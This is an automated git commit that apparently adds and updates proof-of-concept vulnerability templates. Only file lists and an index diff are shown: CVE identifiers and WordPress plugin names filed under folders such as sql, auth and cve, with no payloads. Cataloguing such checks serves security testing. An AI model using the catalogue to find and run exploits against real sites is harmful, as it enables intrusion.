From afda931d08919edd5e76462be768bf9104ac6c8e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 13 Sep 2024 12:38:50 +0000 Subject: [PATCH] 20240913 --- date.txt | 2 +- poc.txt | 113 +++++++++++++++ poc/adobe/servudaemon-ini.yaml | 42 +++--- ...-api-38ba49601a425b3e76ea50d7fcb5c3bf.yaml | 59 ++++++++ ...-api-5aa30296a4f0ae648270a4e74d17b635.yaml | 59 ++++++++ poc/auth/Mantis-Default_login.yaml | 5 + ...ager-d96b919b70e327f92b0707dadc93f77b.yaml | 59 ++++++++ ...eets-2274954363ea101c579ff78257df6249.yaml | 59 ++++++++ ...ogin-5833fd7b8ccc9d761d8d7cf9f9917d96.yaml | 59 ++++++++ ...2446-12288e54ea2799c2827efda4c629c56e.yaml | 59 ++++++++ ...0068-23426c249d4590c183980f57ce680dee.yaml | 59 ++++++++ ...7182-5df993839d8e6edf9fffc6cbdb77670b.yaml | 59 ++++++++ ...3673-7bf7b9165908fdbf2a2eafaed21dad07.yaml | 59 ++++++++ ...8763-36ed147d9204dfa5b9ca29204c678752.yaml | 59 ++++++++ ...3899-f75ea98633e652b4cb25f75a92267ca3.yaml | 59 ++++++++ ...3255-91eefecce0a74f93379bfae7b9f8769a.yaml | 59 ++++++++ ...5269-87676ca600bde6a78ec815da9ddc8eb7.yaml | 59 ++++++++ ...5270-ff7911032b65570055c615564e945f75.yaml | 59 ++++++++ ...5429-c5b50a2727f0a5beb04680b6d713ea8e.yaml | 59 ++++++++ ...5625-cec96a6e743b0ccdbbe71bef62e99ef5.yaml | 59 ++++++++ ...5561-b3779d524422cb5f6e75ef5f028e49f8.yaml | 59 ++++++++ ...5567-a55055fd86860f71a8b1255aa0514d09.yaml | 59 ++++++++ ...5628-1341f1db3b0e886d8e7026974e839398.yaml | 59 ++++++++ ...5789-aefcab5998ef352002c627c10b26cbb1.yaml | 59 ++++++++ ...5867-c6c99bf3f91229f19ab5549c865f8aea.yaml | 59 ++++++++ ...5869-611101c87cbed518f9857873a13fd418.yaml | 59 ++++++++ ...5870-72d352e62d854d49b010539851855ac0.yaml | 59 ++++++++ ...5884-52f9cdbe6dddeb2847b178967af0721e.yaml | 59 ++++++++ ...6020-5176ea957ebdce07a35c57808b2e82fe.yaml | 59 ++++++++ ...6544-e9fb2eb34b85b7537083daf3a92b49f4.yaml | 59 ++++++++ ...6792-caf9c03fac6a04307d723bd20d75de7c.yaml | 59 ++++++++ ...6846-a3b80ea88f57506dc9d9e2d910bbf04b.yaml | 59 ++++++++ ...6888-b452cc3f182752280bb057c3435438a7.yaml | 59 ++++++++ ...6889-1c8272a1873b60c8fedb66ae1ee69c2e.yaml | 59 ++++++++ ...6910-579d75d9cc4716699d11831eae3d5143.yaml | 59 ++++++++ ...7132-a80035d85237acc3ef439cd2cd18c516.yaml | 59 ++++++++ ...7354-d12966f5f3ae3670ae8b5bd2b022ab06.yaml | 59 ++++++++ ...7423-beef10a23166777228f21f82780dd30d.yaml | 59 ++++++++ ...7716-2ebb70230dde389a8f6f5a9c0160affa.yaml | 59 ++++++++ ...7786-bad1bfe3a589408fe56217e3142344ed.yaml | 59 ++++++++ ...7888-483a84d579a54e76d3a8b4799ba22e2b.yaml | 59 ++++++++ ...7891-a07b427b3532ab45f1726dadba231414.yaml | 59 ++++++++ ...7955-5e9fd490f09c7370ea858a067ee264fd.yaml | 59 ++++++++ ...8031-f6e05cbf1fd3b18d02657892077c5da5.yaml | 59 ++++++++ ...8242-cdbbac228ad219af93b654766e13b83b.yaml | 59 ++++++++ ...8269-eb32a5853ffb2001bfd3e5a673037190.yaml | 59 ++++++++ ...8656-1116395151f79029236816f9e11f544d.yaml | 59 ++++++++ ...8663-483f5812b103f5a68eb659c586f798b2.yaml | 59 ++++++++ ...8664-a1a28b91e5f96df0c76ded650a87a835.yaml | 59 ++++++++ ...8665-d05eed41be11b2c07c036fabd71a8c1b.yaml | 59 ++++++++ ...8714-03b5605b5eeba70097fb089d33700336.yaml | 59 ++++++++ ...8730-efc3370bbeb807667af618ae74e58df1.yaml | 59 ++++++++ ...8731-b5fad8172a537c5460328250b82e6ef6.yaml | 59 ++++++++ ...8732-f30eab986c0f8516da683155679193fc.yaml | 59 ++++++++ ...8734-0bca25c266f3dd7ab05ff586726bddcc.yaml | 59 ++++++++ ...8737-bb181fa6ba6a94643f4ee6a0b1df28c1.yaml | 59 ++++++++ ...8742-40e6379c1e4c681d6815f3308854ba0d.yaml | 59 ++++++++ ...8747-f757d510ac120bf89329e22a6153766c.yaml | 59 ++++++++ poc/cve/cve-2005-3344.yaml | 28 +--- poc/cve/cve-2010-0219.yaml | 29 +--- poc/cve/cve-2016-1000136.yaml | 5 +- poc/cve/cve-2016-3978.yaml | 30 ++-- poc/cve/cve-2017-11512.yaml | 20 +-- poc/cve/cve-2017-18598.yaml | 88 ++++-------- poc/cve/cve-2017-5631.yaml | 25 +--- poc/cve/cve-2017-7269.yaml | 45 ++++++ poc/cve/cve-2017-7529.yaml | 36 +++-- poc/cve/cve-2017-9833.yaml | 27 +--- poc/cve/cve-2018-1000226.yaml | 34 ++--- poc/cve/cve-2018-1000671.yaml | 33 +++++ poc/cve/cve-2018-10956.yaml | 27 +--- poc/cve/cve-2018-12300.yaml | 31 ++--- poc/cve/cve-2018-1247.yaml | 1 - poc/cve/cve-2018-12675.yaml | 18 +-- poc/cve/cve-2018-14918.yaml | 21 +-- poc/cve/cve-2018-16761.yaml | 20 +-- poc/cve/cve-2018-19365.yaml | 31 ++--- poc/cve/cve-2018-7602.yaml | 45 +++--- poc/cve/cve-2018-7662.yaml | 30 +--- poc/cve/cve-2018-9161.yaml | 22 +-- poc/cve/cve-2019-10758.yaml | 34 ++--- poc/cve/cve-2019-17503.yaml | 35 +++++ poc/cve/cve-2019-5127.yaml | 47 +++++++ poc/cve/cve-2019-6715.yaml | 30 ++++ poc/cve/cve-2020-10547.yaml | 12 +- poc/cve/cve-2020-12447.yaml | 22 +-- poc/cve/cve-2020-15050.yaml | 26 +--- poc/cve/cve-2020-18268.yaml | 32 ++--- poc/cve/cve-2020-26876.yaml | 15 +- poc/cve/cve-2020-27866.yaml | 7 +- poc/cve/cve-2020-35846.yaml | 9 +- poc/cve/cve-2020-36365.yaml | 30 ++-- poc/cve/cve-2020-8644.yaml | 40 ++---- poc/cve/cve-2020-8772.yaml | 86 ++---------- poc/cve/cve-2020-9036.yaml | 6 +- poc/cve/cve-2021-20123.yaml | 30 ++-- poc/cve/cve-2021-20150.yaml | 33 ++--- poc/cve/cve-2021-20158.yaml | 35 ++--- poc/cve/cve-2021-21311.yaml | 65 ++------- poc/cve/cve-2021-24926.yaml | 25 +--- poc/cve/cve-2021-24947.yaml | 31 ++--- poc/cve/cve-2021-25074.yaml | 33 ++--- poc/cve/cve-2021-25111.yaml | 24 +--- poc/cve/cve-2021-41282.yaml | 49 +++---- poc/cve/cve-2021-41691.yaml | 24 ++-- poc/cve/cve-2021-4191.yaml | 24 +--- poc/cve/cve-2021-45967.yaml | 29 +--- poc/cve/cve-2022-0149.yaml | 27 +--- poc/cve/cve-2022-0346.yaml | 23 +--- poc/cve/cve-2022-0381.yaml | 56 ++------ poc/cve/cve-2022-0591.yaml | 44 +----- poc/cve/cve-2022-1598.yaml | 29 +--- poc/cve/cve-2022-22963.yaml | 24 +--- poc/cve/cve-2022-23134.yaml | 33 +---- poc/cve/cve-2022-24124.yaml | 23 +--- poc/cve/cve-2022-25216.yaml | 26 +--- poc/cve/cve-2022-27849.yaml | 20 +-- poc/cve/cve-2022-28363.yaml | 34 ++--- poc/cve/cve-2022-28365.yaml | 27 ++-- poc/cve/cve-2022-32444.yaml | 20 +-- poc/cve/cve-2022-42889.yaml | 130 +++++++++--------- poc/debug/laravel-debug-mode-405.yaml | 60 ++++---- poc/default/Mantis-Default_login.yaml | 5 + poc/laravel/laravel-debug-mode-405.yaml | 60 ++++---- ...-api-38ba49601a425b3e76ea50d7fcb5c3bf.yaml | 59 ++++++++ ...-api-5aa30296a4f0ae648270a4e74d17b635.yaml | 59 ++++++++ ...orms-dbba8836e7c63cb37d729f0bede3c08c.yaml | 59 ++++++++ ...-lms-ef4f55a1a9193b0f96c64942d4d06097.yaml | 59 ++++++++ poc/other/Symantec-Messaging-Gateway.yaml | 10 +- ...auty-af9641ba5dc553a449654ef14a59f791.yaml | 59 ++++++++ ...ider-47bcd81d4514b99552c241ecb59905d9.yaml | 59 ++++++++ ...ting-ecc300d4a146eb5fa016a0c1753ad120.yaml | 59 ++++++++ ...ocks-d1afbe7fe0adeb3b4e8c4851395b42e6.yaml | 59 ++++++++ ...mits-3783595ba4ef5e542f7f4b09997c59ec.yaml | 59 ++++++++ ...cate-be1dd882c5127ca050d4475dd55704a0.yaml | 59 ++++++++ ...code-be43cfd9d399fba1f8b44a6dac9327bb.yaml | 59 ++++++++ ...lite-bb5f23aa595372d8f56de7733b43289d.yaml | 59 ++++++++ ...lite-07659033abd50bc07bbb85d0c2c40ea8.yaml | 59 ++++++++ ...lite-66feb39b6f192a89af6b7a7c392fc4f9.yaml | 59 ++++++++ ...tact-628f849b35a63914cc2a2dfc18459221.yaml | 59 ++++++++ ...ator-1007572ad74a1525d3e599dfc0947e74.yaml | 59 ++++++++ ...jobs-fe4abc94d1b3a54df636c66ccc18fe03.yaml | 59 ++++++++ ...lace-91f4d8bbc24ad8bb807fb53be34c26ec.yaml | 59 ++++++++ ...orly-2046cef31a20a206df02f665f01316a1.yaml | 59 ++++++++ poc/other/parametros-preguicosos.yaml | 59 ++++++++ ...ator-501ab9fae6b71897e59ae34630113849.yaml | 59 ++++++++ ...aker-699c5ccba8a85c1a969fe9ae0872dda6.yaml | 59 ++++++++ ...tion-5e0d9df78ac9d4442faef8b580ff6a03.yaml | 59 ++++++++ ...tion-a6226aec94d543dc2c23085879e76e28.yaml | 59 ++++++++ ...oads-5b228709f387f8ae0d1b397d9bc429ac.yaml | 59 ++++++++ poc/other/sitemap.yaml | 75 +++++----- ...rbox-0b40d1ee6028266a39beb0c58d6d2b92.yaml | 59 ++++++++ ...ream-42c36199990b21951ee1ae2816559fc3.yaml | 59 ++++++++ ...ker5-7499f94acf789ea7420fecd8147fd86f.yaml | 59 ++++++++ ...chwp-d6548d2e4933cf977717e8edbf658732.yaml | 59 ++++++++ ...7182-5df993839d8e6edf9fffc6cbdb77670b.yaml | 59 ++++++++ ...3673-7bf7b9165908fdbf2a2eafaed21dad07.yaml | 59 ++++++++ ...5625-cec96a6e743b0ccdbbe71bef62e99ef5.yaml | 59 ++++++++ ...5628-1341f1db3b0e886d8e7026974e839398.yaml | 59 ++++++++ ...5884-52f9cdbe6dddeb2847b178967af0721e.yaml | 59 ++++++++ ...6889-1c8272a1873b60c8fedb66ae1ee69c2e.yaml | 59 ++++++++ ...7891-a07b427b3532ab45f1726dadba231414.yaml | 59 ++++++++ ...8242-cdbbac228ad219af93b654766e13b83b.yaml | 59 ++++++++ ...heme-2738eb196d5cf7002027db186214d929.yaml | 59 ++++++++ ...ider-2fe9ad7647c04f89fbdba50824aa349b.yaml | 59 ++++++++ ...fier-b42fe76d662d705db55d79a49ebb4329.yaml | 59 ++++++++ ...lder-fde4dbc1536b247a205ddac8a2a684c9.yaml | 59 ++++++++ ...ider-6788144065d375977e89ac972dbadb54.yaml | 59 ++++++++ ...oles-270e3fdb06570cfef003e572f24bd104.yaml | 59 ++++++++ ...orms-dbba8836e7c63cb37d729f0bede3c08c.yaml | 59 ++++++++ ...chwp-d6548d2e4933cf977717e8edbf658732.yaml | 59 ++++++++ ...lite-56db9447fe27bdd7df2cf18aa839dda3.yaml | 59 ++++++++ ...free-2b58d77210c6a77720f0b93f6e969f27.yaml | 59 ++++++++ ...cewp-93f0a57183ff79e378986791039cd4c0.yaml | 59 ++++++++ ...chwp-d6548d2e4933cf977717e8edbf658732.yaml | 59 ++++++++ ...itor-e1f8a5df86e1e39a02f9abdc9b9b624e.yaml | 59 ++++++++ ...ndar-34f4a1a718c60d12e4d96b373b4a77ce.yaml | 59 ++++++++ ...mail-d972e6fc6b9fbf14ec77704417abbfe0.yaml | 59 ++++++++ ...like-5dc71d194ef6b07e577c2653b00da476.yaml | 59 ++++++++ ...lper-3e174cda9ee64e9ecefee07080044ff5.yaml | 59 ++++++++ 180 files changed, 7337 insertions(+), 1402 deletions(-) create mode 100644 poc/api/mstore-api-38ba49601a425b3e76ea50d7fcb5c3bf.yaml create mode 100644 poc/api/mstore-api-5aa30296a4f0ae648270a4e74d17b635.yaml create mode 100644 poc/auth/login-screen-manager-d96b919b70e327f92b0707dadc93f77b.yaml create mode 100644 poc/auth/sign-up-sheets-2274954363ea101c579ff78257df6249.yaml create mode 100644 poc/auth/yith-custom-login-5833fd7b8ccc9d761d8d7cf9f9917d96.yaml create mode 100644 poc/cve/CVE-2022-2446-12288e54ea2799c2827efda4c629c56e.yaml create mode 100644 poc/cve/CVE-2023-40068-23426c249d4590c183980f57ce680dee.yaml create mode 100644 poc/cve/CVE-2023-47182-5df993839d8e6edf9fffc6cbdb77670b.yaml create mode 100644 poc/cve/CVE-2024-3673-7bf7b9165908fdbf2a2eafaed21dad07.yaml create mode 100644 poc/cve/CVE-2024-38763-36ed147d9204dfa5b9ca29204c678752.yaml create mode 100644 poc/cve/CVE-2024-3899-f75ea98633e652b4cb25f75a92267ca3.yaml create mode 100644 poc/cve/CVE-2024-43255-91eefecce0a74f93379bfae7b9f8769a.yaml create mode 100644 poc/cve/CVE-2024-45269-87676ca600bde6a78ec815da9ddc8eb7.yaml create mode 100644 poc/cve/CVE-2024-45270-ff7911032b65570055c615564e945f75.yaml create mode 100644 poc/cve/CVE-2024-45429-c5b50a2727f0a5beb04680b6d713ea8e.yaml create mode 100644 poc/cve/CVE-2024-45625-cec96a6e743b0ccdbbe71bef62e99ef5.yaml create mode 100644 poc/cve/CVE-2024-5561-b3779d524422cb5f6e75ef5f028e49f8.yaml create mode 100644 poc/cve/CVE-2024-5567-a55055fd86860f71a8b1255aa0514d09.yaml create mode 100644 poc/cve/CVE-2024-5628-1341f1db3b0e886d8e7026974e839398.yaml create mode 100644 poc/cve/CVE-2024-5789-aefcab5998ef352002c627c10b26cbb1.yaml create mode 100644 poc/cve/CVE-2024-5867-c6c99bf3f91229f19ab5549c865f8aea.yaml create mode 100644 poc/cve/CVE-2024-5869-611101c87cbed518f9857873a13fd418.yaml create mode 100644 poc/cve/CVE-2024-5870-72d352e62d854d49b010539851855ac0.yaml create mode 100644 poc/cve/CVE-2024-5884-52f9cdbe6dddeb2847b178967af0721e.yaml create mode 100644 poc/cve/CVE-2024-6020-5176ea957ebdce07a35c57808b2e82fe.yaml create mode 100644 poc/cve/CVE-2024-6544-e9fb2eb34b85b7537083daf3a92b49f4.yaml create mode 100644 poc/cve/CVE-2024-6792-caf9c03fac6a04307d723bd20d75de7c.yaml create mode 100644 poc/cve/CVE-2024-6846-a3b80ea88f57506dc9d9e2d910bbf04b.yaml create mode 100644 poc/cve/CVE-2024-6888-b452cc3f182752280bb057c3435438a7.yaml create mode 100644 poc/cve/CVE-2024-6889-1c8272a1873b60c8fedb66ae1ee69c2e.yaml create mode 100644 poc/cve/CVE-2024-6910-579d75d9cc4716699d11831eae3d5143.yaml create mode 100644 poc/cve/CVE-2024-7132-a80035d85237acc3ef439cd2cd18c516.yaml create mode 100644 poc/cve/CVE-2024-7354-d12966f5f3ae3670ae8b5bd2b022ab06.yaml create mode 100644 poc/cve/CVE-2024-7423-beef10a23166777228f21f82780dd30d.yaml create mode 100644 poc/cve/CVE-2024-7716-2ebb70230dde389a8f6f5a9c0160affa.yaml create mode 100644 poc/cve/CVE-2024-7786-bad1bfe3a589408fe56217e3142344ed.yaml create mode 100644 poc/cve/CVE-2024-7888-483a84d579a54e76d3a8b4799ba22e2b.yaml create mode 100644 poc/cve/CVE-2024-7891-a07b427b3532ab45f1726dadba231414.yaml create mode 100644 poc/cve/CVE-2024-7955-5e9fd490f09c7370ea858a067ee264fd.yaml create mode 100644 poc/cve/CVE-2024-8031-f6e05cbf1fd3b18d02657892077c5da5.yaml create mode 100644 poc/cve/CVE-2024-8242-cdbbac228ad219af93b654766e13b83b.yaml create mode 100644 poc/cve/CVE-2024-8269-eb32a5853ffb2001bfd3e5a673037190.yaml create mode 100644 poc/cve/CVE-2024-8656-1116395151f79029236816f9e11f544d.yaml create mode 100644 poc/cve/CVE-2024-8663-483f5812b103f5a68eb659c586f798b2.yaml create mode 100644 poc/cve/CVE-2024-8664-a1a28b91e5f96df0c76ded650a87a835.yaml create mode 100644 poc/cve/CVE-2024-8665-d05eed41be11b2c07c036fabd71a8c1b.yaml create mode 100644 poc/cve/CVE-2024-8714-03b5605b5eeba70097fb089d33700336.yaml create mode 100644 poc/cve/CVE-2024-8730-efc3370bbeb807667af618ae74e58df1.yaml create mode 100644 poc/cve/CVE-2024-8731-b5fad8172a537c5460328250b82e6ef6.yaml create mode 100644 poc/cve/CVE-2024-8732-f30eab986c0f8516da683155679193fc.yaml create mode 100644 poc/cve/CVE-2024-8734-0bca25c266f3dd7ab05ff586726bddcc.yaml create mode 100644 poc/cve/CVE-2024-8737-bb181fa6ba6a94643f4ee6a0b1df28c1.yaml create mode 100644 poc/cve/CVE-2024-8742-40e6379c1e4c681d6815f3308854ba0d.yaml create mode 100644 poc/cve/CVE-2024-8747-f757d510ac120bf89329e22a6153766c.yaml create mode 100644 poc/cve/cve-2017-7269.yaml create mode 100644 poc/cve/cve-2018-1000671.yaml create mode 100644 poc/cve/cve-2019-17503.yaml create mode 100644 poc/cve/cve-2019-5127.yaml create mode 100644 poc/cve/cve-2019-6715.yaml create mode 100644 poc/microsoft/mstore-api-38ba49601a425b3e76ea50d7fcb5c3bf.yaml create mode 100644 poc/microsoft/mstore-api-5aa30296a4f0ae648270a4e74d17b635.yaml create mode 100644 poc/microsoft/ninja-forms-dbba8836e7c63cb37d729f0bede3c08c.yaml create mode 100644 poc/microsoft/sensei-lms-ef4f55a1a9193b0f96c64942d4d06097.yaml create mode 100644 poc/other/beauty-af9641ba5dc553a449654ef14a59f791.yaml create mode 100644 poc/other/carousel-slider-47bcd81d4514b99552c241ecb59905d9.yaml create mode 100644 poc/other/classified-listing-ecc300d4a146eb5fa016a0c1753ad120.yaml create mode 100644 poc/other/coblocks-d1afbe7fe0adeb3b4e8c4851395b42e6.yaml create mode 100644 poc/other/custom-post-limits-3783595ba4ef5e542f7f4b09997c59ec.yaml create mode 100644 poc/other/delicate-be1dd882c5127ca050d4475dd55704a0.yaml create mode 100644 poc/other/email-obfuscate-shortcode-be43cfd9d399fba1f8b44a6dac9327bb.yaml create mode 100644 poc/other/envira-gallery-lite-bb5f23aa595372d8f56de7733b43289d.yaml create mode 100644 poc/other/essential-addons-for-elementor-lite-07659033abd50bc07bbb85d0c2c40ea8.yaml create mode 100644 poc/other/eventon-lite-66feb39b6f192a89af6b7a7c392fc4f9.yaml create mode 100644 poc/other/floating-contact-628f849b35a63914cc2a2dfc18459221.yaml create mode 100644 poc/other/forminator-1007572ad74a1525d3e599dfc0947e74.yaml create mode 100644 poc/other/leira-cron-jobs-fe4abc94d1b3a54df636c66ccc18fe03.yaml create mode 100644 poc/other/lucas-string-replace-91f4d8bbc24ad8bb807fb53be34c26ec.yaml create mode 100644 poc/other/neighborly-2046cef31a20a206df02f665f01316a1.yaml create mode 100644 poc/other/parametros-preguicosos.yaml create mode 100644 poc/other/pdf-thumbnail-generator-501ab9fae6b71897e59ae34630113849.yaml create mode 100644 poc/other/popup-maker-699c5ccba8a85c1a969fe9ae0872dda6.yaml create mode 100644 poc/other/secure-copy-content-protection-5e0d9df78ac9d4442faef8b580ff6a03.yaml create mode 100644 poc/other/secure-copy-content-protection-a6226aec94d543dc2c23085879e76e28.yaml create mode 100644 poc/other/secure-downloads-5b228709f387f8ae0d1b397d9bc429ac.yaml create mode 100644 poc/other/starbox-0b40d1ee6028266a39beb0c58d6d2b92.yaml create mode 100644 poc/other/stream-42c36199990b21951ee1ae2816559fc3.yaml create mode 100644 poc/other/tweaker5-7499f94acf789ea7420fecd8147fd86f.yaml create mode 100644 poc/search/smartsearchwp-d6548d2e4933cf977717e8edbf658732.yaml create mode 100644 poc/sql/CVE-2023-47182-5df993839d8e6edf9fffc6cbdb77670b.yaml create mode 100644 poc/sql/CVE-2024-3673-7bf7b9165908fdbf2a2eafaed21dad07.yaml create mode 100644 poc/sql/CVE-2024-45625-cec96a6e743b0ccdbbe71bef62e99ef5.yaml create mode 100644 poc/sql/CVE-2024-5628-1341f1db3b0e886d8e7026974e839398.yaml create mode 100644 poc/sql/CVE-2024-5884-52f9cdbe6dddeb2847b178967af0721e.yaml create mode 100644 poc/sql/CVE-2024-6889-1c8272a1873b60c8fedb66ae1ee69c2e.yaml create mode 100644 poc/sql/CVE-2024-7891-a07b427b3532ab45f1726dadba231414.yaml create mode 100644 poc/sql/CVE-2024-8242-cdbbac228ad219af93b654766e13b83b.yaml create mode 100644 poc/sql/betheme-2738eb196d5cf7002027db186214d929.yaml create mode 100644 poc/sql/carousel-slider-2fe9ad7647c04f89fbdba50824aa349b.yaml create mode 100644 poc/sql/exit-notifier-b42fe76d662d705db55d79a49ebb4329.yaml create mode 100644 poc/sql/fusion-builder-fde4dbc1536b247a205ddac8a2a684c9.yaml create mode 100644 poc/sql/gs-logo-slider-6788144065d375977e89ac972dbadb54.yaml create mode 100644 poc/sql/leira-roles-270e3fdb06570cfef003e572f24bd104.yaml create mode 100644 poc/sql/ninja-forms-dbba8836e7c63cb37d729f0bede3c08c.yaml create mode 100644 poc/sql/smartsearchwp-d6548d2e4933cf977717e8edbf658732.yaml create mode 100644 poc/sql/triton-lite-56db9447fe27bdd7df2cf18aa839dda3.yaml create mode 100644 poc/web/web-directory-free-2b58d77210c6a77720f0b93f6e969f27.yaml create mode 100644 poc/wordpress/slicewp-93f0a57183ff79e378986791039cd4c0.yaml create mode 100644 poc/wordpress/smartsearchwp-d6548d2e4933cf977717e8edbf658732.yaml create mode 100644 poc/wordpress/wp-editor-e1f8a5df86e1e39a02f9abdc9b9b624e.yaml create mode 100644 poc/wordpress/wp-simple-booking-calendar-34f4a1a718c60d12e4d96b373b4a77ce.yaml create mode 100644 poc/wordpress/wp-test-email-d972e6fc6b9fbf14ec77704417abbfe0.yaml create mode 100644 poc/wordpress/wp-ulike-5dc71d194ef6b07e577c2653b00da476.yaml create mode 100644 poc/wordpress/wpcodefactory-helper-3e174cda9ee64e9ecefee07080044ff5.yaml diff --git a/date.txt b/date.txt index 8dcf10768e..bc24009907 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20240912 +20240913 diff --git a/poc.txt b/poc.txt index 2eedc14fb3..23f0dc8aa2 100644 --- a/poc.txt +++ b/poc.txt @@ -1234,8 +1234,10 @@ ./poc/api/mstore-api-1c2cd9ed5c2d1dcf576fe7aecb5ca226.yaml ./poc/api/mstore-api-319cdcd8aefa6dfb47435662ea3be489.yaml ./poc/api/mstore-api-3678a5cbd624bf906b9f1499b42e328d.yaml +./poc/api/mstore-api-38ba49601a425b3e76ea50d7fcb5c3bf.yaml ./poc/api/mstore-api-3bbe1e9b2827123550346928e2f78aea.yaml ./poc/api/mstore-api-47e384bbd4951ebb4d217ea16a357447.yaml +./poc/api/mstore-api-5aa30296a4f0ae648270a4e74d17b635.yaml ./poc/api/mstore-api-6455a4c18e211ec9c979086a333e3980.yaml ./poc/api/mstore-api-6a7c29035944a1901b23ef2195208fe3.yaml ./poc/api/mstore-api-79265025e2ae87c5e5adf65c0d03eeec.yaml @@ -3767,6 +3769,7 @@ ./poc/auth/login-rebuilder.yaml ./poc/auth/login-recaptcha-f9f2c15f1d2609deb00e84bb916415e9.yaml ./poc/auth/login-recaptcha.yaml +./poc/auth/login-screen-manager-d96b919b70e327f92b0707dadc93f77b.yaml ./poc/auth/login-screen-manager-f2ebb2bced0f8fa6daae5365c8836e32.yaml ./poc/auth/login-screen-manager.yaml ./poc/auth/login-sidebar-widget-9391ea35c1f441dfd2f444fdf3bafc64.yaml @@ -4869,6 +4872,7 @@ ./poc/auth/showdoc-default-password.yaml ./poc/auth/showdoc-default-password.yml ./poc/auth/sign-up-sheets-1a6bc6a5a2c08c5e6e6543ee5950eb9e.yaml +./poc/auth/sign-up-sheets-2274954363ea101c579ff78257df6249.yaml ./poc/auth/sign-up-sheets-37dbcb1f7bd48f11c063a32fe62ce9d8.yaml ./poc/auth/sign-up-sheets-4cfd3ee2304849a528ea45a428b1f377.yaml ./poc/auth/sign-up-sheets-79815b18051a852a7c88fb7eaae91d13.yaml @@ -5720,6 +5724,7 @@ ./poc/auth/xxljob-executor-unauth.yaml ./poc/auth/yealink-default-login.yaml ./poc/auth/yealinkpreauthrce(1).yaml +./poc/auth/yith-custom-login-5833fd7b8ccc9d761d8d7cf9f9917d96.yaml ./poc/auth/yith-custom-login-9828ed878d121d268e86215520b51df0.yaml ./poc/auth/yith-custom-login.yaml ./poc/auth/yith-easy-login-register-popup-for-woocommerce-af03f00eafbcbe5e2d95aac25b61c1ec.yaml @@ -20138,6 +20143,7 @@ ./poc/cve/CVE-2022-2444.yaml ./poc/cve/CVE-2022-2445-2ab79483ecb27e775838b2914c2ff86e.yaml ./poc/cve/CVE-2022-2445.yaml +./poc/cve/CVE-2022-2446-12288e54ea2799c2827efda4c629c56e.yaml ./poc/cve/CVE-2022-2448-0af5df1738f51aa31a5a88073f6afaa4.yaml ./poc/cve/CVE-2022-2448.yaml ./poc/cve/CVE-2022-2449-74fbb953a2601d563a5e25e71dc44f8a.yaml @@ -28212,6 +28218,7 @@ ./poc/cve/CVE-2023-40011-b5590cfb303a6bd14071f54aa7a5c86c.yaml ./poc/cve/CVE-2023-40011.yaml ./poc/cve/CVE-2023-40044.yaml +./poc/cve/CVE-2023-40068-23426c249d4590c183980f57ce680dee.yaml ./poc/cve/CVE-2023-40068-b461d5b89b24b251c1525611a31c2ffc.yaml ./poc/cve/CVE-2023-40068.yaml ./poc/cve/CVE-2023-4013-22b43f8b9be49b5526e1e59257e0706e.yaml @@ -29592,6 +29599,7 @@ ./poc/cve/CVE-2023-47180.yaml ./poc/cve/CVE-2023-47181-9c0be9e81dccc2f58c0f69f40f8eb124.yaml ./poc/cve/CVE-2023-47181.yaml +./poc/cve/CVE-2023-47182-5df993839d8e6edf9fffc6cbdb77670b.yaml ./poc/cve/CVE-2023-47182.yaml ./poc/cve/CVE-2023-47183-e3ce4d4a55dedc39984f57ee90d97593.yaml ./poc/cve/CVE-2023-47183.yaml @@ -38625,6 +38633,7 @@ ./poc/cve/CVE-2024-3671.yaml ./poc/cve/CVE-2024-3672-ca9ab6267807f7244bff8128b2dae6aa.yaml ./poc/cve/CVE-2024-3672.yaml +./poc/cve/CVE-2024-3673-7bf7b9165908fdbf2a2eafaed21dad07.yaml ./poc/cve/CVE-2024-3674-f8f0b109f3145321593d24900c5cc332.yaml ./poc/cve/CVE-2024-3674.yaml ./poc/cve/CVE-2024-3675-ab9d70a2aa7a1cb36dd2d6bcc86d91eb.yaml @@ -39572,6 +39581,7 @@ ./poc/cve/CVE-2024-38761.yaml ./poc/cve/CVE-2024-38762-5bc9b1c949da89aac05601671afecbf2.yaml ./poc/cve/CVE-2024-38762.yaml +./poc/cve/CVE-2024-38763-36ed147d9204dfa5b9ca29204c678752.yaml ./poc/cve/CVE-2024-38763-bbe5f07a8050f985b6906c6853591f21.yaml ./poc/cve/CVE-2024-38763.yaml ./poc/cve/CVE-2024-38764-8d2c8a2991c868644602fac1922489b2.yaml @@ -39663,6 +39673,7 @@ ./poc/cve/CVE-2024-3896.yaml ./poc/cve/CVE-2024-3897-46d1fe2e9d16e9d37f92404a3ccb2bbb.yaml ./poc/cve/CVE-2024-3897.yaml +./poc/cve/CVE-2024-3899-f75ea98633e652b4cb25f75a92267ca3.yaml ./poc/cve/CVE-2024-3903-cd897961c23f09c84cf4c805374a27a9.yaml ./poc/cve/CVE-2024-3903.yaml ./poc/cve/CVE-2024-3915-7659a2687c6966f355d82a6a63bbd9c1.yaml @@ -40299,6 +40310,7 @@ ./poc/cve/CVE-2024-43254-45b63d56497d30988092c35280a0f346.yaml ./poc/cve/CVE-2024-43254-ab3e4aac5098aa3c00587af765319448.yaml ./poc/cve/CVE-2024-43254.yaml +./poc/cve/CVE-2024-43255-91eefecce0a74f93379bfae7b9f8769a.yaml ./poc/cve/CVE-2024-43255-c5e379d221966e401191b74f67ed5c1d.yaml ./poc/cve/CVE-2024-43255.yaml ./poc/cve/CVE-2024-43256-866dd2f4b3efe33271abaa94fe764d76.yaml @@ -40907,6 +40919,8 @@ ./poc/cve/CVE-2024-4489.yaml ./poc/cve/CVE-2024-4490-a71279b5729f40993764b7f4a01c6356.yaml ./poc/cve/CVE-2024-4490.yaml +./poc/cve/CVE-2024-45269-87676ca600bde6a78ec815da9ddc8eb7.yaml +./poc/cve/CVE-2024-45270-ff7911032b65570055c615564e945f75.yaml ./poc/cve/CVE-2024-4529-884e2529f1fd12601eb8d52d2b887907.yaml ./poc/cve/CVE-2024-4529.yaml ./poc/cve/CVE-2024-4530-9a40def000de87d4be3ea01c097a6a90.yaml @@ -40924,6 +40938,7 @@ ./poc/cve/CVE-2024-4541-a13821acc4717443a1924b4c9fcddcab.yaml ./poc/cve/CVE-2024-4541.yaml ./poc/cve/CVE-2024-4542.yaml +./poc/cve/CVE-2024-45429-c5b50a2727f0a5beb04680b6d713ea8e.yaml ./poc/cve/CVE-2024-4543-471483dd2519c0928697bdeec029b2c5.yaml ./poc/cve/CVE-2024-4543.yaml ./poc/cve/CVE-2024-4544-5e470a25a8681a5bc02ba1f3b19ae5aa.yaml @@ -40939,6 +40954,7 @@ 